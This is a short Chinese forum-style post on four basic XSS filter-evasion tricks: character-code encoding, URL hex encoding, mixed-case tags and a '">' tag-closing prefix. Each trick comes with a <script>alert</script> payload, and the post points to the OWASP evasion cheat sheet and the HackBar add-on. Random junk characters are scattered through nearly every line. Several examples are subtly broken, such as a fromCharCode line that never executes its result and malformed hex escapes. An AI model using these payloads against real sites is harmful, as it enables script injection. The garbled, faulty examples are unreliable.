四种超级基础的绕过方法。2 _% r% ]9 D0 p& R( `
1.转换为ASCII码6 y8 e% ~. L/ F. w. w2 O2 l0 h g+ b
例子:原脚本为<script>alert(‘I love F4ck’)</script >
5 I. R; y$ f* ]/ ~ j4 A* `6 n通过转换,变成:
. J; m8 p6 _- T0 c( o3 }<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
: M% R6 ?. T7 y! J5 r _2 t/ t 2 V# f7 ^" `4 i, m
2.转换为HEX(十六进制)9 j. d# H" l* c9 O' x
例子:原脚本为<script>alert(‘I love F4ck’)</script>! @5 f: M+ I# m4 j
通过转换,变成:
4 v! ~) k6 G; l4 p+ R8 j' Q8 J%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e* l" k- G9 J; |
! Q U. E) }7 ]$ S( z3.转换脚本的大小写
! ~+ f: B) u2 d2 a% \例子:原脚本为<script>alert(‘I love F4ck’)</script>
9 d) Z% C- C, X& Y9 H转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
: w2 ~# I+ ]( k0 x: C/ T1 Q
9 ^) f3 x% b0 I/ @2 l1 e" Q/ R4.增加闭合标记”>6 @9 d) Q4 v6 t8 G
例子:原脚本为<script>alert(‘I love F4ck’)</script>/ @ K+ O: \( v, S6 ?
转换为:”><script>alert(‘I love F4ck’)</script>5 ]. W: J0 V: d. E0 A
更详细绕过技术请参考此网页
9 Q& X( t' ~! Ehttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
8 ?* j' \4 x: ?) B
3 V2 ?6 y- g0 q$ e k" `+ B6 d转换工具使用的是火狐的 hackbar mozilla addon. |